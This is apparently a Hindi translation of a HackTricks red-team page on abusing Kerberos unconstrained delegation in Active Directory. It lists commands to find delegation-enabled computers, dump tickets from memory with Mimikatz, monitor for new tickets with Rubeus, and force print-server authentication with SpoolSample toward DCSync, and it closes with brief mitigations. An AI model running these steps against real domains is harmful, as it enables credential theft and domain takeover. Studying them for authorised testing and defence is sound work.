Unconstrained Delegation

Reading time: 4 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

Unconstrained delegation

यह एक विशेषता है जिसे एक Domain Administrator किसी भी Computer पर सेट कर सकता है जो डोमेन के अंदर है। फिर, जब भी कोई उपयोगकर्ता उस Computer पर लॉगिन करता है, उस उपयोगकर्ता का TGT की एक प्रति DC द्वारा प्रदान किए गए TGS के अंदर भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर Administrator विशेषाधिकार हैं, तो आप टिकटों को डंप कर सकते हैं और किसी भी मशीन पर उपयोगकर्ताओं का अनुकरण कर सकते हैं

तो यदि एक डोमेन एडमिन "Unconstrained Delegation" विशेषता सक्रिय करके किसी Computer पर लॉगिन करता है, और आपके पास उस मशीन पर स्थानीय एडमिन विशेषाधिकार हैं, तो आप टिकट को डंप कर सकते हैं और डोमेन एडमिन का अनुकरण कहीं भी कर सकते हैं (डोमेन प्रिवेस्क)।

आप इस विशेषता के साथ Computer ऑब्जेक्ट्स को खोज सकते हैं यह जांचकर कि userAccountControl विशेषता में ADS_UF_TRUSTED_FOR_DELEGATION शामिल है या नहीं। आप इसे ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP फ़िल्टर के साथ कर सकते हैं, जो powerview करता है:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन प्रिवेस्क के लिए उपयोगी नहीं होते
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz के साथ टिकट निर्यात करें
privilege::debug
sekurlsa::tickets /export #अनुशंसित तरीका
kerberos::list /export #एक और तरीका

# लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser: /interval:10 #हर 10 सेकंड में नए TGT के लिए जांचें

Mimikatz या Rubeus के साथ Administrator (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें Pass the Ticket के लिए।
अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Unconstrained delegation के बारे में अधिक जानकारी ired.team पर।

Force Authentication

यदि एक हमलावर "Unconstrained Delegation" के लिए अनुमत एक कंप्यूटर को समझौता करने में सक्षम है, तो वह Print server को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है जिससे सर्वर की मेमोरी में एक TGT सहेजी जाएगी
फिर, हमलावर उपयोगकर्ता Print server कंप्यूटर खाते का अनुकरण करने के लिए Pass the Ticket हमला कर सकता है

किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन कराने के लिए आप SpoolSample का उपयोग कर सकते हैं:

bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine>

यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync attack कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।
इस हमले के बारे में अधिक जानकारी ired.team पर।

यहाँ प्रमाणीकरण को मजबूर करने के अन्य तरीके हैं:

Force NTLM Privileged Authentication

शमन

  • DA/एडमिन लॉगिन को विशिष्ट सेवाओं तक सीमित करें
  • विशेषाधिकार प्राप्त खातों के लिए "खाता संवेदनशील है और इसे प्रतिनिधित्व नहीं किया जा सकता" सेट करें।

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें